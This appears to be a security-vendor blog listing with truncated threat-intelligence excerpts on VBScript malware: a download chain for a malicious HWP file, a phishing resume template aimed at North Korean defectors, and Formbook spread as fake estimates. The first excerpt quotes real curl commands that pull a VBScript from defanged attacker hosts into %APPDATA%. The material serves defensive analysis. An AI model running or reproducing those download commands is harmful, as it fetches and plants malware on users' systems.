VBScript

Malicious HWP File Disguised as a Happy Birthday Message (OLE Object)

The ASEC analysis team has recently discovered a VBScript that downloads a malicious HWP file. The distribution path of malware is yet to be determined, but the VBScript is downloaded through curl. The commands discovered so far are as follows: curl  -H \”user-agent: chrome/103.0.5060.134 safari/537.32\” hxxp://datkka.atwebpages[.]com/2vbs -o %appdata%\\vbtemp cmd /c cd > %appdata%\\tmp~pth && curl hxxps://datarium.epizy[.]com/2vbs -o %appdata%\\vbtemp Both commands save scripts in the %APPDATA% folder as vbtemp. As shown below, hxxp://datkka.atwebpages[.]com/2vbs contains VBScript codes that perform features such as registering to task…

APT Attack Disguised as Resume Template for North Korean Defectors (VBS Script)

The ASEC analysis team has recently discovered that a malicious info-leaking VBS is being distributed via phishing email disguised as North Korea-related material. The email is about casting calls for a North Korea-related broadcast, and a compressed file is attached to it. It asks the readers to fill out the resume, prompting them to run the file. The compressed file contains a malicious VBS script file. The activities of ‘2022 Resume Template.vbs’ are as follows: Collects and sends information Creates…

Change in Distribution Method of Malware Disguised as Estimate (VBS Script)

Last year, the ASEC analysis team has discovered the distribution of Formbook that used a certain company’s name in its filename. Recently, the team has discovered that it is being distributed via VBS file. The email used for distribution still contains details about a request for an estimate, and by using a certain company’s name in the attachment, it prompts the user to execute it. The compressed file attached to the email does not contain an executable but a VBS…